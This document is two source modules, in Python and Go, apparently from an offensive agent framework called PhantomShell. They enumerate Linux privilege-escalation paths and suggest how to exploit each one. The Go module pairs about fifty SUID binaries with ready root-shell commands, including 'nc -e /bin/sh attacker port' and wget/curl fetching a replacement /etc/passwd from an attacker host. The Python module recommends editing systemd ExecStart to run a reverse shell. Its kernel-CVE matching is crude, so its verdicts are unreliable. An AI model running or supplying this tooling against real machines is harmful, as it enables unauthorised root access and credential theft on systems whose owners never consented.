File: agents/python/modules/privesc.py
"""Privilege escalation enumeration module."""

import os
import subprocess

NAME = "privesc"

GTFOBINS = {
    "aa-exec", "ab", "agetty", "alpine", "ar", "aria2c", "arj", "arp", "as",
    "ascii-xfr", "ash", "aspell", "atobm", "awk", "base32", "base64",
    "basenc", "bash", "bridge", "busctl", "busybox", "byebug", "bzip2",
    "capsh", "cat", "chmod", "chown", "chroot", "cmp", "column", "comm",
    "cobc", "cpan", "cpio", "cpulimit", "csh", "csplit", "csvtool", "curl",
    "cut", "dash", "date", "dd", "dialog", "diff", "dig", "dmesg",
    "docker", "dpkg", "dvips", "easy_install", "eb", "ed", "emacs",
    "env", "eqn", "expand", "expect", "facter", "file", "find", "fish",
    "flock", "fmt", "fold", "ftp", "gawk", "gcc", "gdb", "gem", "gimp",
    "git", "grep", "gtester", "gzip", "hd", "head", "hexdump", "highlight",
    "iconv", "iftop", "install", "ionice", "ip", "irb", "ispell", "jjs",
    "join", "journalctl", "jq", "jrunscript", "ksh", "ksshell", "kubectl",
    "latex", "ldconfig", "less", "logsave", "look", "ltrace", "lua",
    "make", "man", "mawk", "more", "mount", "mtr", "mv", "mysql", "nano",
    "nasm", "nawk", "nc", "nice", "nl", "nmap", "node", "nohup", "npm",
    "nsenter", "od", "openssl", "openvpn", "paste", "perf", "perl", "pg",
    "php", "pic", "pico", "pip", "pkexec", "pr", "pry", "psql", "puppet",
    "python", "python3", "rake", "readelf", "red", "redcarpet", "restic",
    "rev", "rlwrap", "rpm", "rpmquery", "rsync", "ruby", "run-parts",
    "rview", "rvim", "sash", "scanmem", "scp", "screen", "script", "sed",
    "service", "setarch", "sftp", "shuf", "smbclient", "socat", "sort",
    "split", "sqlite3", "ss", "ssh", "start-stop-daemon", "stdbuf",
    "strace", "strings", "su", "sysctl", "systemctl", "tac", "tail",
    "tar", "taskset", "tclsh", "tee", "telnet", "tftp", "time", "timeout",
    "tmux", "top", "troff", "ul", "unexpand", "uniq", "unshare", "unzip",
    "update-alternatives", "uudecode", "uuencode", "valgrind", "vi", "vim",
    "vimdiff", "virsh", "w3m", "wall", "watch", "wc", "wget", "whois",
    "wish", "xargs", "xdotool", "xmodmap", "xmore", "xz", "yarn", "yum",
    "zsh", "zypper",
}

KERNEL_CVES = [
    {"cve": "CVE-2016-5195", "name": "DirtyCow", "versions": "< 4.8.3", "min": (2, 6), "max": (4, 8, 3)},
    {"cve": "CVE-2021-3156", "name": "Baron Samedit (sudo)", "versions": "sudo < 1.9.5p2", "check": "sudo --version"},
    {"cve": "CVE-2021-4034", "name": "PwnKit (pkexec)", "versions": "polkit < 0.120", "check": "pkexec --version"},
    {"cve": "CVE-2022-0847", "name": "DirtyPipe", "versions": "5.8 - 5.16.11", "min": (5, 8), "max": (5, 16, 11)},
    {"cve": "CVE-2022-2586", "name": "nf_tables", "versions": "5.x", "min": (5, 0), "max": (5, 19)},
    {"cve": "CVE-2023-0386", "name": "OverlayFS", "versions": "5.11 - 6.2", "min": (5, 11), "max": (6, 2)},
    {"cve": "CVE-2023-2640", "name": "GameOverlay", "versions": "Ubuntu specific", "check": "cat /etc/os-release"},
    {"cve": "CVE-2023-32233", "name": "Netfilter nf_tables", "versions": "< 6.4", "min": (5, 0), "max": (6, 3, 99)},
    {"cve": "CVE-2024-1086", "name": "nf_tables use-after-free", "versions": "5.14 - 6.6", "min": (5, 14), "max": (6, 6)},
]


def _run(cmd: str) -> str:
    try:
        return subprocess.check_output(cmd, shell=True, stderr=subprocess.DEVNULL, timeout=30).decode(errors="replace").strip()
    except Exception:
        return ""


def _parse_kernel() -> tuple:
    ver = _run("uname -r").split("-")[0]
    parts = ver.split(".")
    return tuple(int(p) for p in parts if p.isdigit())


def cmd_privesc_check() -> dict:
    results = {}

    suid = _run("find / -perm -4000 -type f 2>/dev/null")
    suid_list = [s.strip() for s in suid.splitlines() if s.strip()]
    suid_gtfo = [s for s in suid_list if os.path.basename(s) in GTFOBINS]
    results["suid"] = {"all": suid_list, "gtfobins_matches": suid_gtfo}

    sgid = _run("find / -perm -2000 -type f 2>/dev/null")
    results["sgid"] = [s.strip() for s in sgid.splitlines() if s.strip()]

    results["sudo"] = _run("sudo -l 2>/dev/null")

    caps = _run("getcap -r / 2>/dev/null")
    results["capabilities"] = [c.strip() for c in caps.splitlines() if c.strip()]

    crontab = _run("cat /etc/crontab 2>/dev/null")
    cron_d = _run("ls -la /etc/cron.d/ 2>/dev/null")
    user_cron = _run("crontab -l 2>/dev/null")
    results["cron"] = {"system": crontab, "cron_d": cron_d, "user": user_cron}

    writable_services = _run("find /etc/systemd /lib/systemd -writable -type f 2>/dev/null")
    results["writable_services"] = [s.strip() for s in writable_services.splitlines() if s.strip()]

    groups = _run("id")
    results["groups"] = groups
    results["docker"] = "docker" in groups.lower()
    results["lxd"] = "lxd" in groups.lower()

    nfs = _run("cat /etc/exports 2>/dev/null")
    results["nfs_no_root_squash"] = "no_root_squash" in nfs if nfs else False
    results["nfs_exports"] = nfs

    writable_path = []
    for d in os.getenv("PATH", "").split(":"):
        if d and os.path.isdir(d) and os.access(d, os.W_OK):
            writable_path.append(d)
    results["writable_path_dirs"] = writable_path

    localhost_services = _run("ss -tlnp 2>/dev/null | grep '127.0.0'")
    results["localhost_services"] = localhost_services

    writable_py = _run("python3 -c \"import sys; print('\\n'.join(sys.path))\" 2>/dev/null")
    writable_py_dirs = []
    for d in writable_py.splitlines():
        if d.strip() and os.path.isdir(d.strip()) and os.access(d.strip(), os.W_OK):
            writable_py_dirs.append(d.strip())
    results["writable_python_paths"] = writable_py_dirs

    timers = _run("systemctl list-timers --all --no-pager 2>/dev/null")
    results["timers"] = timers

    results["kernel"] = _run("uname -r")

    return results


def cmd_privesc_suggest() -> dict:
    check = cmd_privesc_check()
    suggestions = []

    if check.get("suid", {}).get("gtfobins_matches"):
        for b in check["suid"]["gtfobins_matches"]:
            name = os.path.basename(b)
            suggestions.append({
                "vector": f"SUID - {name}",
                "path": b,
                "risk": "high",
                "info": f"GTFOBins SUID binary. Check: https://gtfobins.github.io/gtfobins/{name}/#suid",
            })

    if check.get("docker"):
        suggestions.append({
            "vector": "Docker Group",
            "risk": "high",
            "info": "docker run -v /:/host -it alpine chroot /host bash",
        })

    if check.get("writable_python_paths"):
        suggestions.append({
            "vector": "Python Library Hijacking",
            "paths": check["writable_python_paths"],
            "risk": "medium",
            "info": "Writable Python paths — check for scripts run as root that import from these",
        })

    if check.get("writable_services"):
        suggestions.append({
            "vector": "Writable Systemd Service",
            "paths": check["writable_services"],
            "risk": "high",
            "info": "Modify ExecStart to run a reverse shell",
        })

    if check.get("nfs_no_root_squash"):
        suggestions.append({
            "vector": "NFS no_root_squash",
            "risk": "high",
            "info": "Mount share, create SUID binary as root",
        })

    if check.get("lxd"):
        suggestions.append({
            "vector": "LXD Group",
            "risk": "high",
            "info": "lxd init + lxc mount host filesystem",
        })

    return {"suggestions": suggestions, "count": len(suggestions)}


def cmd_vuln_scan() -> dict:
    kernel = _parse_kernel()
    if not kernel:
        return {"error": "Could not parse kernel version"}

    vulnerable = []
    for cve in KERNEL_CVES:
        if "min" in cve and "max" in cve:
            if cve["min"] <= kernel <= cve["max"]:
                vulnerable.append({
                    "cve": cve["cve"],
                    "name": cve["name"],
                    "affected": cve["versions"],
                    "kernel": ".".join(str(p) for p in kernel),
                })
        elif "check" in cve:
            output = _run(cve["check"])
            if output:
                vulnerable.append({
                    "cve": cve["cve"],
                    "name": cve["name"],
                    "affected": cve["versions"],
                    "check_output": output[:200],
                })

    return {"kernel": ".".join(str(p) for p in kernel), "vulnerabilities": vulnerable, "count": len(vulnerable)}


COMMANDS = {
    "privesc_check": {"handler": cmd_privesc_check, "description": "Comprehensive privilege escalation enumeration"},
    "privesc_suggest": {"handler": cmd_privesc_suggest, "description": "Analyze and suggest privesc paths"},
    "vuln_scan": {"handler": cmd_vuln_scan, "description": "Scan for known kernel/software CVEs"},
}

File: agents/go/modules/privesc.go
package modules

import (
	"fmt"
	"os"
	"runtime"
	"strings"

	"github.com/OmonovSarvar/PhantomShell/agents/go/core"
)

// GTFOBins top 50 SUID binaries that can be abused for privilege escalation.
var gtfobins = map[string]string{
	"bash":       "bash -p",
	"sh":         "sh -p",
	"dash":       "dash -p",
	"csh":        "csh -b",
	"zsh":        "zsh",
	"ksh":        "ksh -p",
	"env":        "env /bin/sh -p",
	"find":       "find . -exec /bin/sh -p \\;",
	"nmap":       "nmap --interactive -> !sh",
	"vim":        "vim -c ':!sh'",
	"vi":         "vi -c ':!sh'",
	"nano":       "nano -> ^R^X -> reset; sh 1>&0 2>&0",
	"less":       "less /etc/passwd -> !sh",
	"more":       "more /etc/passwd -> !sh",
	"man":        "man man -> !sh",
	"awk":        "awk 'BEGIN {system(\"/bin/sh\")}'",
	"perl":       "perl -e 'exec \"/bin/sh\"'",
	"python":     "python -c 'import os; os.execl(\"/bin/sh\",\"sh\",\"-p\")'",
	"python3":    "python3 -c 'import os; os.execl(\"/bin/sh\",\"sh\",\"-p\")'",
	"ruby":       "ruby -e 'exec \"/bin/sh\"'",
	"lua":        "lua -e 'os.execute(\"/bin/sh\")'",
	"php":        "php -r 'system(\"/bin/sh\");'",
	"node":       "node -e 'require(\"child_process\").spawn(\"/bin/sh\",...)'",
	"tar":        "tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh",
	"zip":        "zip /tmp/x.zip /etc/passwd -T --unzip-command='sh -c /bin/sh'",
	"gcc":        "gcc -wrapper /bin/sh,-s .",
	"make":       "COMMAND='/bin/sh' make -s --eval=$'x:\\n\\t-$(COMMAND)'",
	"docker":     "docker run -v /:/mnt --rm -it alpine chroot /mnt sh",
	"strace":     "strace -o /dev/null /bin/sh",
	"ltrace":     "ltrace -b -L /bin/sh",
	"cp":         "cp /bin/sh /tmp/sh && chmod +s /tmp/sh",
	"mv":         "overwrite /etc/passwd",
	"wget":       "wget http://attacker/passwd -O /etc/passwd",
	"curl":       "curl http://attacker/passwd -o /etc/passwd",
	"dd":         "dd if=/etc/shadow of=/tmp/shadow",
	"tee":        "echo data | tee /etc/passwd",
	"nc":         "nc -e /bin/sh attacker port",
	"socat":      "socat stdin exec:/bin/sh",
	"ssh":        "ssh -o ProxyCommand=';sh 0<&2 1>&2' x",
	"scp":        "scp -S /tmp/exploit.sh x y:",
	"rsync":      "rsync -e 'sh -c sh' :x x",
	"git":        "git help status -> !sh",
	"screen":     "screen -> C-a :exec sh",
	"tmux":       "tmux -> :!sh",
	"script":     "script -qc /bin/sh /dev/null",
	"expect":     "expect -c 'spawn /bin/sh;interact'",
	"taskset":    "taskset 1 /bin/sh -p",
	"time":       "/usr/bin/time /bin/sh",
	"timeout":    "timeout 10 /bin/sh",
	"nice":       "nice /bin/sh -p",
	"ionice":     "ionice /bin/sh -p",
}

// Known kernel CVEs with version patterns
var kernelCVEs = []struct {
	Name     string
	CVE      string
	Versions string // simplified version match pattern
}{
	{"DirtyPipe", "CVE-2022-0847", "5.8"},
	{"DirtyCow", "CVE-2016-5195", "2.6,3.,4."},
	{"GameOver(lay)", "CVE-2023-2640", "5.15,6.2"},
	{"nf_tables", "CVE-2023-32233", "5.1,6."},
	{"PwnKit", "CVE-2021-4034", "polkit"},
	{"Looney Tunables", "CVE-2023-4911", "glibc"},
	{"StackRot", "CVE-2023-3269", "6.1,6.2,6.3,6.4"},
}

func RegisterPrivesc(d *core.Dispatcher, exec *core.Executor) {
	d.Register("privesc", func(args map[string]interface{}) map[string]interface{} {
		if runtime.GOOS != "linux" {
			return map[string]interface{}{"status": "error", "error": "privesc checks only supported on linux"}
		}
		return handlePrivesc(exec)
	})
}

func handlePrivesc(exec *core.Executor) map[string]interface{} {
	findings := make(map[string]interface{})

	// SUID binaries
	suidOut, _, _ := exec.Run("find / -perm -4000 -type f 2>/dev/null", 0)
	var suidFindings []map[string]string
	for _, line := range strings.Split(strings.TrimSpace(suidOut), "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		parts := strings.Split(line, "/")
		binName := parts[len(parts)-1]
		if exploit, ok := gtfobins[binName]; ok {
			suidFindings = append(suidFindings, map[string]string{
				"path":    line,
				"binary":  binName,
				"exploit": exploit,
			})
		}
	}
	findings["suid"] = suidFindings

	// Sudo -l
	sudoOut, _, code := exec.Run("sudo -l 2>/dev/null", 0)
	if code == 0 && sudoOut != "" {
		findings["sudo"] = sudoOut
	}

	// Writable sensitive files
	var writable []string
	for _, path := range []string{"/etc/passwd", "/etc/shadow", "/etc/crontab", "/etc/sudoers"} {
		if f, err := os.OpenFile(path, os.O_WRONLY, 0); err == nil {
			f.Close()
			writable = append(writable, path)
		}
	}
	findings["writable_files"] = writable

	// Cron jobs
	cronOut, _, _ := exec.Run("ls -la /etc/cron* /var/spool/cron/crontabs/ 2>/dev/null; cat /etc/crontab 2>/dev/null", 0)
	if cronOut != "" {
		findings["cron"] = cronOut
	}

	// Writable systemd service files
	svcOut, _, _ := exec.Run("find /etc/systemd/system -writable -type f 2>/dev/null", 0)
	if strings.TrimSpace(svcOut) != "" {
		findings["writable_services"] = strings.Split(strings.TrimSpace(svcOut), "\n")
	}

	// Docker group
	groupOut, _, _ := exec.Run("id 2>/dev/null", 0)
	if strings.Contains(groupOut, "docker") {
		findings["docker_group"] = true
	}

	// Kernel version + CVE matching
	kernelOut, _, _ := exec.Run("uname -r 2>/dev/null", 0)
	kernel := strings.TrimSpace(kernelOut)
	findings["kernel"] = kernel

	var cves []map[string]string
	for _, cve := range kernelCVEs {
		for _, ver := range strings.Split(cve.Versions, ",") {
			if strings.Contains(kernel, ver) {
				cves = append(cves, map[string]string{
					"name": cve.Name,
					"cve":  cve.CVE,
				})
				break
			}
		}
	}
	findings["potential_cves"] = cves

	// Capabilities
	capOut, _, _ := exec.Run("getcap -r / 2>/dev/null | head -50", 0)
	if strings.TrimSpace(capOut) != "" {
		findings["capabilities"] = strings.Split(strings.TrimSpace(capOut), "\n")
	}

	// PATH hijacking: writable directories in PATH
	pathEnv := os.Getenv("PATH")
	var hijackable []string
	for _, dir := range strings.Split(pathEnv, ":") {
		if info, err := os.Stat(dir); err == nil {
			// Check if writable by current user
			if info.Mode().Perm()&0002 != 0 { // world-writable
				hijackable = append(hijackable, fmt.Sprintf("%s (world-writable)", dir))
			}
		}
	}
	findings["path_hijack"] = hijackable

	// NFS no_root_squash
	exportsOut, _, _ := exec.Run("cat /etc/exports 2>/dev/null", 0)
	if strings.Contains(exportsOut, "no_root_squash") {
		findings["nfs_nosquash"] = exportsOut
	}

	return map[string]interface{}{"status": "success", "data": findings}
}
